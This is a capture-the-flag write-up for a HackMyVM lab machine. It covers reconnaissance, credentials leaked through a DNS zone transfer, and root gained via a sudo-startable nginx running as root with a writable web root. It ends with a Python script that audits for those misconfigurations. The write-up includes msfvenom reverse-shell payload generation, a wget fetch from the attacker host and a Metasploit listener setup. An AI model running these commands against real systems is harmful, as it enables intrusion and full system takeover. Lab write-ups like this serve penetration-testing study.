Hackmyvm target series (1) -webmaster
2022-07-06 14:03:00 【The moon should know my meaning】
1. Information gathering
First use nmap to scan the subnet for live hosts. Since there are many hosts on the campus network, I do not look through them one by one but use grep to pick out the target host (a VirtualBox VM) directly.
nmap -sP 192.168.200.0/24 | grep -i -B 2 virtualbox
Port-scan the target host to find the services it exposes.
nmap -sT -T4 -sV -O -A -sC -p- 192.168.200.8
Three services are found: ssh, dns and http.
Visiting the site shows a picture that roughly asks where you keep your password. A quick search shows that Bitwarden and Keepass are password management tools. Note the TXT mentioned at the bottom; it is an important hint.
Use dirsearch to scan for directories.
dirsearch -u http://192.168.200.8 -e php,html,txt,7z,zip,gz,db,bz2,bak -x 404,301,500-599 -t 30
However, nothing useful is found.
The picture hints at txt, so try brute-forcing txt files with wfuzz.
wfuzz -c --sc=200,302 -w /tools/dict/directory-list-2.3-medium.txt http://192.168.200.8/FUZZ.txt
As with dirsearch, nothing useful turns up.
Then look at the page source and find webmaster.hmv, which looks like a domain name. Add it to the hosts file for resolution, but that leads nowhere.
2. Exploitation
Recall that nmap found the dns service open, so try dig to pull the DNS records with a zone transfer.
dig axfr @192.168.200.8 webmaster.hmv
# @IP-address specifies the DNS server to query
A very suspicious record is found; it looks like an account and password:
john:Myhiddenpazzword
Try logging in over ssh; the login succeeds.
Get the first flag.
3. Privilege escalation
Next comes privilege escalation.
sudo -l
It turns out nginx can be started by any user via sudo, and no password is needed.
Looking at the process list, nginx is running with root privileges.
Then check the root directory of the website: any user has permission to delete and write files there. Combined with nginx running as root, we can write a shell there and then visit the shell to get root privileges.
First check the host information: it is an x86 host.
Use msf to create the payload.
msfvenom -p php/meterpreter_reverse_tcp lhost=192.168.200.130 lport=5555 -f raw -o shell.php
Then download the payload on the target machine with wget.
wget http://192.168.200.130:7890/shell.php
Grant execute permission.
chmod +x shell.php
Start the listener in msf.
use exploit/multi/handler
set payload php/meterpreter_reverse_tcp
set lhost 192.168.200.130
set lport 5555
Access the payload file from kali. Because nginx runs as root, visiting shell.php yields root privileges.
msf receives the session, and the privileges are root.
Get the last flag.
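The privilege-escalation chain above rests on three misconfigurations: a NOPASSWD sudo rule for nginx, nginx running as root, and a world-writable web root. The following audit script is an added example, not part of this writeup; it assumes captured text of `sudo -l`, `ps -eo user,comm` and `stat -c '%a %U %n'` as input, and the sample outputs embedded below are constructed, not taken from the target.

```python
import re

# Constructed sample outputs (not captured from the target in the writeup).
SUDO_L = """User john may run the following commands on webmaster:
    (ALL) NOPASSWD: /usr/sbin/nginx
"""
PS = """USER     COMMAND
root     nginx
www-data nginx
john     bash
"""
STAT = """755 root /var/www/html
777 root /var/www/html/webmaster
"""

def nopasswd_rules(sudo_l_output):
    """Commands that `sudo -l` reports as runnable with NOPASSWD."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = re.match(r"\([^)]+\)\s+NOPASSWD:\s*(.+)", line.strip())
        if m:
            rules.extend(c.strip() for c in m.group(1).split(","))
    return rules

def root_processes(ps_output, names=("nginx", "php-fpm")):
    """Names from `ps -eo user,comm` that run as root and match a web-server name."""
    hits = set()
    for line in ps_output.splitlines()[1:]:          # skip the header row
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[0] == "root":
            comm = parts[1].strip()
            if any(comm.startswith(n) for n in names):
                hits.add(comm)
    return sorted(hits)

def world_writable(stat_output):
    """Paths from `stat -c '%a %U %n'` whose 'other' write bit is set."""
    mode_owner_path = (line.split(None, 2) for line in stat_output.splitlines())
    return [path for mode, _owner, path in mode_owner_path if int(mode[-1], 8) & 0o2]

def audit(sudo_l_output, ps_output, stat_output):
    """Combine the three checks into findings for the chain described in this writeup."""
    findings = []
    if any(r.endswith("nginx") for r in nopasswd_rules(sudo_l_output)):
        findings.append("sudo: nginx may be started without a password")
    findings += [f"{p} is running as root" for p in root_processes(ps_output)]
    findings += [f"web root {p} is world-writable" for p in world_writable(stat_output)]
    return findings
```

Any single finding is worth fixing; all three together are exactly the chain that turns a write to the web root into a root shell.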